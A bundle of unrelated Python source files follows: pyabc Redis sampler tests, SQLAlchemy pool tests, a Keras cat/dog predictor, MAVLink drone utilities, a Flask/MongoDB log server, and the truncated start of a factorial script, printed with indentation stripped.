def test_redis_catch_error():
def model(pars):
if np.random.uniform() < 0.1:
raise ValueError("error")
return {'s0': pars['p0'] + 0.2 * np.random.uniform()}
def distance(s0, s1):
return abs(s0['s0'] - s1['s0'])
prior = pyabc.Distribution(p0=pyabc.RV("uniform", 0, 10))
sampler = RedisEvalParallelSamplerServerStarter(
batch_size=3, workers=1, processes_per_worker=1)
try:
abc = pyabc.ABCSMC(
model, prior, distance, sampler=sampler, population_size=10)
db_file = "sqlite:///" + os.path.join(tempfile.gettempdir(), "test.db")
data = {'s0': 2.8}
abc.new(db_file, data)
abc.run(minimum_epsilon=.1, max_nr_populations=3)
finally:
sampler.shutdown()
def test_redis_pw_protection():
def simulate_one():
accepted = np.random.randint(2)
return pyabc.Particle(0, {}, 0.1, [], [], accepted)
sampler = RedisEvalParallelSamplerServerStarter( # noqa: S106
password="daenerys")
try:
# needs to be always set
sampler.set_analysis_id("ana_id")
sample = sampler.sample_until_n_accepted(10, simulate_one, 0)
assert 10 == len(sample.get_accepted_population())
finally:
sampler.shutdown()
def test_redis_continuous_analyses():
"""Test correct behavior of the redis server with multiple analyses."""
sampler = RedisEvalParallelSamplerServerStarter()
try:
sampler.set_analysis_id("id1")
# try "starting a new run while the old one has not finished yet"
with pytest.raises(AssertionError) as e:
sampler.set_analysis_id("id2")
assert "busy with an analysis " in str(e.value)
# after stopping it should work
sampler.stop()
sampler.set_analysis_id("id2")
finally:
sampler.shutdown()
def test_redis_subprocess():
"""Test whether the instructed redis sampler allows worker subprocesses."""
# print worker output
logging.getLogger("Redis-Worker").addHandler(logging.StreamHandler())
def model_process(p, pipe):
"""The actual model."""
pipe.send({"y": p['p0'] + 0.1 * np.random.randn(10)})
def model(p):
"""Model calling a subprocess."""
parent, child = multiprocessing.Pipe()
proc = multiprocessing.Process(target=model_process, args=(p, child))
proc.start()
res = parent.recv()
proc.join()
return res
prior = pyabc.Distribution(
p0=pyabc.RV('uniform', -5, 10), p1=pyabc.RV('uniform', -2, 2))
def distance(y1, y2):
return np.abs(y1['y'] - y2['y']).sum()
obs = {'y': 1}
# False as daemon argument is ok, True and None are not allowed
sampler = RedisEvalParallelSamplerServerStarter(
workers=1, processes_per_worker=2, daemon=False)
try:
abc = pyabc.ABCSMC(
model, prior, distance, sampler=sampler,
population_size=10)
abc.new(pyabc.create_sqlite_db_id(), obs)
# would just never return if model evaluation fails
abc.run(max_nr_populations=3)
finally:
sampler.shutdown()
def test_redis_look_ahead():
"""Test the redis sampler in look-ahead mode."""
model, prior, distance, obs = basic_testcase()
eps = pyabc.ListEpsilon([20, 10, 5])
# spice things up with an adaptive population size
pop_size = pyabc.AdaptivePopulationSize(
start_nr_particles=50, mean_cv=0.5, max_population_size=50)
with tempfile.NamedTemporaryFile(mode='w', suffix='.csv') as fh:
sampler = RedisEvalParallelSamplerServerStarter(
look_ahead=True, look_ahead_delay_evaluation=False,
log_file=fh.name)
try:
abc = pyabc.ABCSMC(
model, prior, distance, sampler=sampler,
population_size=pop_size, eps=eps)
abc.new(pyabc.create_sqlite_db_id(), obs)
h = abc.run(max_nr_populations=3)
finally:
sampler.shutdown()
assert h.n_populations == 3
# read log file
df = pd.read_csv(fh.name, sep=',')
assert (df.n_lookahead > 0).any()
assert (df.n_lookahead_accepted > 0).any()
assert (df.n_preliminary == 0).all()
def test_redis_look_ahead_error():
"""Test whether the look-ahead mode fails as expected."""
model, prior, distance, obs = basic_testcase()
with tempfile.NamedTemporaryFile(mode='w', suffix='.csv') as fh:
sampler = RedisEvalParallelSamplerServerStarter(
look_ahead=True, look_ahead_delay_evaluation=False,
log_file=fh.name)
args_list = [
{'eps': pyabc.MedianEpsilon()},
{'distance_function': pyabc.AdaptivePNormDistance()}]
for args in args_list:
if 'distance_function' not in args:
args['distance_function'] = distance
try:
with pytest.raises(AssertionError) as e:
abc = pyabc.ABCSMC(
model, prior, sampler=sampler,
population_size=10, **args)
abc.new(pyabc.create_sqlite_db_id(), obs)
abc.run(max_nr_populations=3)
assert "cannot be used in look-ahead mode" in str(e.value)
finally:
sampler.shutdown()
def test_redis_look_ahead_delayed():
"""Test the look-ahead sampler with delayed evaluation in an adaptive
setup."""
model, prior, distance, obs = basic_testcase()
# spice things up with an adaptive population size
pop_size = pyabc.AdaptivePopulationSize(
start_nr_particles=50, mean_cv=0.5, max_population_size=50)
with tempfile.NamedTemporaryFile(mode='w', suffix='.csv') as fh:
sampler = RedisEvalParallelSamplerLookAheadDelayWrapper(
log_file=fh.name)
try:
abc = pyabc.ABCSMC(
model, prior, distance, sampler=sampler,
population_size=pop_size)
abc.new(pyabc.create_sqlite_db_id(), obs)
abc.run(max_nr_populations=3)
finally:
sampler.shutdown()
# read log file
df = pd.read_csv(fh.name, sep=',')
assert (df.n_lookahead > 0).any()
assert (df.n_lookahead_accepted > 0).any()
# in delayed mode, all look-aheads must have been preliminary
assert (df.n_lookahead == df.n_preliminary).all()
|
test_pool.py
|
import threading, time
from sqlalchemy import pool, interfaces, create_engine, select
import sqlalchemy as tsa
from sqlalchemy.test import TestBase, testing
from sqlalchemy.test.util import gc_collect, lazy_gc
from sqlalchemy.test.testing import eq_
mcid = 1
class MockDBAPI(object):
def __init__(self):
self.throw_error = False
def connect(self, *args, **kwargs):
if self.throw_error:
raise Exception("couldnt connect !")
delay = kwargs.pop('delay', 0)
if delay:
time.sleep(delay)
return MockConnection()
class MockConnection(object):
def __init__(self):
global mcid
self.id = mcid
self.closed = False
mcid += 1
def close(self):
self.closed = True
def rollback(self):
pass
def cursor(self):
return MockCursor()
class MockCursor(object):
def execute(self, *args, **kw):
pass
def close(self):
pass
mock_dbapi = MockDBAPI()
class PoolTestBase(TestBase):
def setup(self):
pool.clear_managers()
@classmethod
def teardown_class(cls):
pool.clear_managers()
class PoolTest(PoolTestBase):
def testmanager(self):
manager = pool.manage(mock_dbapi, use_threadlocal=True)
connection = manager.connect('foo.db')
connection2 = manager.connect('foo.db')
connection3 = manager.connect('bar.db')
self.assert_(connection.cursor() is not None)
self.assert_(connection is connection2)
self.assert_(connection2 is not connection3)
def testbadargs(self):
manager = pool.manage(mock_dbapi)
try:
connection = manager.connect(None)
except:
pass
def testnonthreadlocalmanager(self):
manager = pool.manage(mock_dbapi, use_threadlocal = False)
connection = manager.connect('foo.db')
connection2 = manager.connect('foo.db')
self.assert_(connection.cursor() is not None)
self.assert_(connection is not connection2)
@testing.fails_on('+pyodbc',
"pyodbc cursor doesn't implement tuple __eq__")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select([1], bind=testing.db)))
expected = [(1, )]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (pool.SingletonThreadPool, pool.StaticPool,
pool.QueuePool, pool.NullPool, pool.AssertionPool):
p = cls(creator=creator)
p.dispose()
p.recreate()
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.throw_error = True
p.dispose()
p.recreate()
def testthreadlocal_del(self):
self._do_testthreadlocal(useclose=False)
def testthreadlocal_close(self):
self._do_testthreadlocal(useclose=True)
def _do_testthreadlocal(self, useclose=False):
for p in pool.QueuePool(creator=mock_dbapi.connect,
pool_size=3, max_overflow=-1,
use_threadlocal=True), \
pool.SingletonThreadPool(creator=mock_dbapi.connect,
use_threadlocal=True):
c1 = p.connect()
c2 = p.connect()
self.assert_(c1 is c2)
c3 = p.unique_connection()
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
c2 = p.connect()
self.assert_(c1 is c2)
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
if useclose:
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
c3.close()
c2.close()
self.assert_(c1.connection is not None)
c1.close()
c1 = c2 = c3 = None
# extra tests with QueuePool to ensure connections get
# __del__()ed when dereferenced
if isinstance(p, pool.QueuePool):
lazy_gc()
self.assert_(p.checkedout() == 0)
c1 = p.connect()
c2 = p.connect()
if useclose:
c2.close()
c1.close()
else:
c2 = None
c1 = None
lazy_gc()
self.assert_(p.checkedout() == 0)
def test_properties(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=lambda: dbapi.connect('foo.db'),
pool_size=1, max_overflow=0, use_threadlocal=False)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info['foo'] = 'bar'
c.close()
del c
c = p.connect()
self.assert_('foo' in c.info)
c.invalidate()
c = p.connect()
self.assert_('foo' not in c.info)
c.info['foo2'] = 'bar2'
c.detach()
self.assert_('foo2' in c.info)
c2 = p.connect()
self.assert_(c.connection is not c2.connection)
self.assert_(not c2.info)
self.assert_('foo2' in c.info)
def test_listeners(self):
dbapi = MockDBAPI()
class InstrumentingListener(object):
def __init__(self):
if hasattr(self, 'connect'):
self.connect = self.inst_connect
if hasattr(self, 'first_connect'):
self.first_connect = self.inst_first_connect
if hasattr(self, 'checkout'):
self.checkout = self.inst_checkout
if hasattr(self, 'checkin'):
self.checkin = self.inst_checkin
self.clear()
def clear(self):
self.connected = []
self.first_connected = []
self.checked_out = []
self.checked_in = []
def assert_total(innerself, conn, fconn, cout, cin):
eq_(len(innerself.connected), conn)
eq_(len(innerself.first_connected), fconn)
eq_(len(innerself.checked_out), cout)
eq_(len(innerself.checked_in), cin)
def assert_in(innerself, item, in_conn, in_fconn,
in_cout, in_cin):
self.assert_((item in innerself.connected) == in_conn)
self.assert_((item in innerself.first_connected) == in_fconn)
self.assert_((item in innerself.checked_out) == in_cout)
self.assert_((item in innerself.checked_in) == in_cin)
def inst_connect(self, con, record):
print "connect(%s, %s)" % (con, record)
assert con is not None
assert record is not None
self.connected.append(con)
def inst_first_connect(self, con, record):
print "first_connect(%s, %s)" % (con, record)
assert con is not None
assert record is not None
self.first_connected.append(con)
def inst_checkout(self, con, record, proxy):
print "checkout(%s, %s, %s)" % (con, record, proxy)
assert con is not None
assert record is not None
assert proxy is not None
self.checked_out.append(con)
def inst_checkin(self, con, record):
print "checkin(%s, %s)" % (con, record)
# con can be None if invalidated
assert record is not None
self.checked_in.append(con)
class ListenAll(tsa.interfaces.PoolListener, InstrumentingListener):
pass
class ListenConnect(InstrumentingListener):
def connect(self, con, record):
pass
class ListenFirstConnect(InstrumentingListener):
def first_connect(self, con, record):
pass
class ListenCheckOut(InstrumentingListener):
def checkout(self, con, record, proxy, num):
pass
class ListenCheckIn(InstrumentingListener):
def checkin(self, con, record):
pass
def _pool(**kw):
return pool.QueuePool(creator=lambda: dbapi.connect('foo.db'),
use_threadlocal=False, **kw)
def assert_listeners(p, total, conn, fconn, cout, cin):
for instance in (p, p.recreate()):
self.assert_(len(instance.listeners) == total)
self.assert_(len(instance._on_connect) == conn)
self.assert_(len(instance._on_first_connect) == fconn)
self.assert_(len(instance._on_checkout) == cout)
self.assert_(len(instance._on_checkin) == cin)
p = _pool()
assert_listeners(p, 0, 0, 0, 0, 0)
p.add_listener(ListenAll())
assert_listeners(p, 1, 1, 1, 1, 1)
p.add_listener(ListenConnect())
assert_listeners(p, 2, 2, 1, 1, 1)
p.add_listener(ListenFirstConnect())
assert_listeners(p, 3, 2, 2, 1, 1)
p.add_listener(ListenCheckOut())
assert_listeners(p, 4, 2, 2, 2, 1)
p.add_listener(ListenCheckIn())
assert_listeners(p, 5, 2, 2, 2, 2)
del p
snoop = ListenAll()
p = _pool(listeners=[snoop])
assert_listeners(p, 1, 1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
cc = c.connection
snoop.assert_in(cc, True, True, True, False)
c.close()
snoop.assert_in(cc, True, True, True, True)
del c, cc
snoop.clear()
# this one depends on immediate gc
c = p.connect()
cc = c.connection
snoop.assert_in(cc, False, False, True, False)
snoop.assert_total(0, 0, 1, 0)
del c, cc
lazy_gc()
snoop.assert_total(0, 0, 1, 1)
p.dispose()
snoop.clear()
c = p.connect()
c.close()
c = p.connect()
snoop.assert_total(1, 0, 2, 1)
c.close()
snoop.assert_total(1, 0, 2, 2)
# invalidation
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.invalidate()
snoop.assert_total(1, 0, 1, 1)
c.close()
snoop.assert_total(1, 0, 1, 1)
del c
lazy_gc()
snoop.assert_total(1, 0, 1, 1)
c = p.connect()
snoop.assert_total(2, 0, 2, 1)
c.close()
del c
lazy_gc()
snoop.assert_total(2, 0, 2, 2)
# detached
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.detach()
snoop.assert_total(1, 0, 1, 0)
c.close()
del c
snoop.assert_total(1, 0, 1, 0)
c = p.connect()
snoop.assert_total(2, 0, 2, 0)
c.close()
del c
snoop.assert_total(2, 0, 2, 1)
# recreated
p = p.recreate()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
c.close()
snoop.assert_total(1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 2, 1)
c.close()
snoop.assert_total(1, 1, 2, 2)
def test_listeners_callables(self):
dbapi = MockDBAPI()
def connect(dbapi_con, con_record):
counts[0] += 1
def checkout(dbapi_con, con_record, con_proxy):
counts[1] += 1
def checkin(dbapi_con, con_record):
counts[2] += 1
i_all = dict(connect=connect, checkout=checkout, checkin=checkin)
i_connect = dict(connect=connect)
i_checkout = dict(checkout=checkout)
i_checkin = dict(checkin=checkin)
for cls in (pool.QueuePool, pool.StaticPool):
counts = [0, 0, 0]
def _pool(**kw):
return cls(creator=lambda: dbapi.connect('foo.db'),
use_threadlocal=False, **kw)
def assert_listeners(p, total, conn, cout, cin):
for instance in (p, p.recreate()):
self.assert_(len(instance.listeners) == total)
self.assert_(len(instance._on_connect) == conn)
self.assert_(len(instance._on_checkout) == cout)
self.assert_(len(instance._on_checkin) == cin)
p = _pool()
assert_listeners(p, 0, 0, 0, 0)
p.add_listener(i_all)
assert_listeners(p, 1, 1, 1, 1)
p.add_listener(i_connect)
assert_listeners(p, 2, 2, 1, 1)
p.add_listener(i_checkout)
assert_listeners(p, 3, 2, 2, 1)
p.add_listener(i_checkin)
assert_listeners(p, 4, 2, 2, 2)
del p
p = _pool(listeners=[i_all])
assert_listeners(p, 1, 1, 1, 1)
c = p.connect()
assert counts == [1, 1, 0]
c.close()
assert counts == [1, 1, 1]
c = p.connect()
assert counts == [1, 2, 1]
p.add_listener(i_checkin)
c.close()
assert counts == [1, 2, 3]
def test_listener_after_oninit(self):
"""Test that listeners are called after OnInit is removed"""
called = []
def listener(*args):
called.append(True)
listener.connect = listener
engine = create_engine(testing.db.url)
engine.pool.add_listener(listener)
engine.execute(select([1])).close()
assert called, "Listener not called on connect"
class QueuePoolTest(PoolTestBase):
def testqueuepool_del(self):
self._do_testqueuepool(useclose=False)
def testqueuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=3,
max_overflow=-1, use_threadlocal=False)
def status(pool):
tup = pool.size(), pool.checkedin(), pool.overflow(), \
pool.checkedout()
print 'Pool size: %d Connections in pool: %d Current '\
'Overflow: %d Current Checked out connections: %d' % tup
return tup
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
lazy_gc()
assert not pool._refs
def test_timeout(self):
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=3,
max_overflow=0, use_threadlocal=False,
timeout=2)
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
now = time.time()
try:
c4 = p.connect()
assert False
except tsa.exc.TimeoutError, e:
assert int(time.time() - now) == 2
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
p = pool.QueuePool(
creator = lambda: mock_dbapi.connect(delay=.05),
pool_size = 2,
max_overflow = 1, use_threadlocal = False, timeout=3)
timeouts = []
def checkout():
for x in xrange(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError, e:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in xrange(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join()
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 10, "Not all timeouts were < 10 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
gc_collect()
def creator():
time.sleep(.05)
return mock_dbapi.connect()
p = pool.QueuePool(creator=creator,
pool_size=3, timeout=2,
max_overflow=max_overflow)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in xrange(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join()
self.assert_(max(peaks) <= max_overflow)
lazy_gc()
assert not pool._refs
def test_no_overflow(self):
self._test_overflow(40, 0)
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_mixed_close(self):
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = None
assert p.checkedout() == 1
c1 = None
lazy_gc()
assert p.checkedout() == 0
lazy_gc()
assert not pool._refs
def test_weakref_kaboom(self):
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2 = None
del c1
del c2
gc_collect()
assert p.checkedout() == 0
c3 = p.connect()
assert c3 is not None
def test_trick_the_counter(self):
"""this is a "flaw" in the connection pool; since threadlocal
uses a single ConnectionFairy per thread with an open/close
counter, you can fool the counter into giving you a
ConnectionFairy with an ambiguous counter. i.e. its not true
reference counting."""
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = p.connect()
c2.close()
self.assert_(p.checkedout() != 0)
c2.close()
self.assert_(p.checkedout() == 0)
def test_recycle(self):
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=1,
max_overflow=0, use_threadlocal=False,
recycle=3)
c1 = p.connect()
c_id = id(c1.connection)
c1.close()
c2 = p.connect()
assert id(c2.connection) == c_id
c2.close()
time.sleep(4)
c3 = p.connect()
assert id(c3.connection) != c_id
def test_invalidate(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=lambda : dbapi.connect('foo.db'),
pool_size=1, max_overflow=0,
use_threadlocal=False)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=lambda : dbapi.connect('foo.db'),
pool_size=1, max_overflow=0,
use_threadlocal=False)
p2 = p.recreate()
assert p2.size() == 1
assert p2._use_threadlocal is False
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi = MockDBAPI()
p = pool.QueuePool(creator=lambda : dbapi.connect('foo.db'),
pool_size=1, max_overflow=0,
use_threadlocal=False)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=lambda : dbapi.connect('foo.db'),
pool_size=1, max_overflow=0,
use_threadlocal=False)
c1 = p.connect()
c1.detach()
c_id = c1.connection.id
c2 = p.connect()
assert c2.connection.id != c1.connection.id
dbapi.raise_error = True
c2.invalidate()
c2 = None
c2 = p.connect()
assert c2.connection.id != c1.connection.id
con = c1.connection
assert not con.closed
c1.close()
assert con.closed
def test_threadfairy(self):
p = pool.QueuePool(creator=mock_dbapi.connect, pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c1.close()
c2 = p.connect()
assert c2.connection is not None
class SingletonThreadPoolTest(PoolTestBase):
def test_cleanup(self):
"""test that the pool's connections are OK after cleanup() has
been called."""
p = pool.SingletonThreadPool(creator=mock_dbapi.connect,
pool_size=3)
def checkout():
for x in xrange(10):
c = p.connect()
assert c
c.cursor()
c.close()
time.sleep(.1)
threads = []
for i in xrange(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join()
assert len(p._all_conns) == 3
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator = lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c_id = c1.connection.id
c1.close(); c1=None
c1 = p.connect()
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
creator = lambda: dbapi.connect('foo.db')
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
|
predict.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat May 12 10:08:11 2018
@author: rakshith
"""
import os, time
import numpy as np
import argparse
from keras.models import load_model
from keras.preprocessing import image
from multiprocessing import Process
PATH = os.getcwd()
CLASSES = ['Cat', 'Dog']
print_string = ''
def wait():
"""This method is used for printing wait process.
"""
animation = "|/-\\"
idx = 0
while (1):
print('[\033[92m INFO \033[0m] '+print_string+' '+animation[idx % len(animation)], end="\r")
idx += 1
time.sleep(0.1)
def start_animation():
"""Start printing function as another process.
"""
global p1
p1 = Process(target=wait)
p1.start()
def stop_animation():
"""Kills the process.
"""
p1.terminate()
def predict(img_path, model):
img = image.load_img(img_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
preds = model.predict(x)
return preds
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--image', default = 'test_images/2.jpeg')
parser.add_argument('--model', default = 'resnet50_best.h5')
args = parser.parse_args()
model_path = PATH+'/'+(args.model)
os.system('clear')
print_string='Loading Model'
start_animation()
t0 = time.time()
model = load_model(model_path)
t1 = time.time()
stop_animation()
print('[\033[92m INFO \033[0m] Loaded model ')
print('[\033[92m INFO \033[0m] Loaded in: {0:.2f}s'.format(t1-t0))
test_path = PATH+'/'+(args.image)
preds = predict(test_path, model)
y_classes = preds.argmax(axis=-1)
print('[\033[96m RESULT \033[0m] Probability Vector: ',preds)
print('[\033[96m RESULT \033[0m] Class: ',CLASSES[y_classes[0]])
|
main_utils.py
|
# Copyright 2020, NTRobotics
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
from pymavlink.mavutil import mavlink, mavlink_connection
def _send_heartbeat(connection, armed=False):
base_mode = 0b10000000 if armed else 0b00000000
while connection._ntr_sending_heartbeat:
connection.mav.heartbeat_send(mavlink.MAV_TYPE_GCS, mavlink.MAV_AUTOPILOT_INVALID, base_mode, 0, 0)
time.sleep(1)
def start_sending_heartbeat(connection, armed=False):
connection._ntr_sending_heartbeat = True
connection._ntr_heartbeat_thread = threading.Thread(target=_send_heartbeat, args=(connection, armed,), daemon=True)
connection._ntr_heartbeat_thread.start()
def stop_sending_heartbeat(connection):
connection._ntr_sending_heartbeat = False
connection._ntr_heartbeat_thread.join()
def send_command(connection, command, param1=0, param2=0, param3=0, param4=0, param5=0, param6=0, param7=0, blocking=False):
connection.mav.command_long_send(
connection.target_system,
connection.target_component,
command, confirmation=0,
param1=param1, param2=param2, param3=param3, param4=param4, param5=param5, param6=param6, param7=param7
)
if blocking:
response = connection.recv_match(type='COMMAND_ACK', condition=('COMMAND_ACK.command == %d' % command), blocking=True)
return response.result
def reboot(connection):
result = send_command(connection, mavlink.MAV_CMD_PREFLIGHT_REBOOT_SHUTDOWN, blocking=True, param2=1)
return (result == mavlink.MAV_RESULT_ACCEPTED)
def shutdown(connection):
result = send_command(connection, mavlink.MAV_CMD_PREFLIGHT_REBOOT_SHUTDOWN, blocking=True, param2=2)
return (result == mavlink.MAV_RESULT_ACCEPTED)
def connect():
f = open('navblock_ip.txt')
try:
ip = f.read()
finally:
f.close()
return mavlink_connection('udpout:%s:14540' % (ip), source_system=1, source_component=0, dialect='common')
def handle_statustext(connection, msg):
if msg.get_type() != 'STATUSTEXT':
raise TypeError('Wrong type of message')
if not connection.mavlink20():
print(msg.text)
return
if msg.id == 0:
print(msg.text)
return
try:
connection._ntr_statustext_buffer[msg.id][msg.chunk_seq] = msg.text
except AttributeError:
connection._ntr_statustext_buffer = { msg.id: { msg.chunk_seq: msg.text } }
except KeyError:
connection._ntr_statustext_buffer[msg.id] = { msg.chunk_seq: msg.text }
if len(msg.text) < 50:
msg_sequence = connection._ntr_statustext_buffer[msg.id]
text = ''
prev_chunk_seq = min(msg_sequence) - 1
if prev_chunk_seq != -1:
text += '{...}'
for chunk_seq in sorted(msg_sequence):
if (prev_chunk_seq + 1) != chunk_seq:
text += '{...}'
text += msg_sequence[chunk_seq]
prev_chunk_seq = chunk_seq
print()
print(text)
connection._ntr_statustext_buffer.pop(msg.id)
|
flask_server.py
|
"""
All responses have
mimetype="application/json",
headers={"Access-Control-Allow-Origin": "*"}
"""
from flask import Flask, request, Response
from logger_mongo import run_logger
from multiprocessing import Process
import time
import json
import logging
import pprint
import pymongo
app = Flask(__name__)
# If top > col.count() or top = 0 then col.count() documents will be returned
def get_data(prefix, top_min=1, top_max=100):
"""
Returns request.args["top"] last entries from prefix+request.args["pair"]
:param prefix: prefix of collection to be used: log_ or tech_
:param top_min: minimum allowed number of last orders to be requested
:param top_max: maximum allowed number of last orders to be requested
:return: Flask response_class with appropriate status and error message if required
"""
# Processing 'pair' parameter
if "pair" not in request.args:
return {"error": "Mandatory parameter 'pair' is absent"}, 400
col_name = prefix + request.args["pair"]
if col_name not in col_names:
return {"error": 'Not supported currency pair'}, 400
# Processing 'top' parameter (if present)
if "top" not in request.args:
top = 1
else:
try:
top = int(request.args["top"])
except ValueError:
return {"error": "Parameter 'top' must be non-negative integer"}, 400
if top < top_min or top > top_max:
return {"error": "Parameter 'top' must satisfy inequality 0 < 'top' <= 100"}, 400
# Fetching 'top' last entries for 'pair' from database
col = db[col_name]
try:
db_response = list(col.find(
projection={"_id": False},
limit=top,
sort=[("_id", pymongo.DESCENDING)])
)
return db_response, 200
except Exception as e:
print(type(e))
print(e)
return {"error": "Some problems with database occurred"}, 500
def generate_response(data, status):
# Processing 'pretty' parameter
if "pretty" not in request.args:
pretty = False
else:
if request.args["pretty"] == "1":
pretty = True
else:
pretty = False
if pretty:
return app.response_class(
response=pprint.pformat(data),
status=status,
mimetype="text/plain",
headers={"Access-Control-Allow-Origin": "*"}
)
else:
return app.response_class(
response=json.dumps(data),
status=status,
mimetype="application/json",
headers={"Access-Control-Allow-Origin": "*"}
)
@app.route('/get_pairs', methods=['GET'])
def get_pairs():
data = pairs
status = 200
return generate_response(data, status)
@app.route('/get_tech', methods=['GET'])
def get_tech_data():
data, status = get_data('tech_')
return generate_response(data, status)
@app.route('/', methods=['GET'])
def get_log_data():
data, status = get_data('log_')
return generate_response(data, status)
if __name__ == '__main__':
# Initialization
mongo_config = json.load(open('mongo_config.json'))
mongo_path = mongo_config['auth_string']
db_name = mongo_config['database']
config_file = mongo_config['orders_config']
limit = mongo_config['limit']
pairs = mongo_config['pairs']
# Logging to MongoDB
# for pair in pairs:
# p = Process(target=run_logger, args=(pair, limit, config_file, mongo_path, db_name))
# p.start()
# time.sleep(0.3)
# time.sleep(120)
# Connecting to database for server requests
client = pymongo.MongoClient(mongo_path) # defaults to port 27017
db = client[db_name]
col_names = set(db.collection_names())
# Flask logging
logger = logging.getLogger('werkzeug')
handler = logging.FileHandler('access.log')
logger.addHandler(handler)
app.logger.addHandler(handler)
# Starting server
app.run(host='0.0.0.0')
|
tarea_6.py
|
import threading
import math
factorial_bunch = []
def calculate_factorial(begin, end, step, n):
result = 0
for i in range(begin, end, step):
result += int(n/5**i)
factorial_bunch.append(result)
if __name__ == "__main__":
process = 4
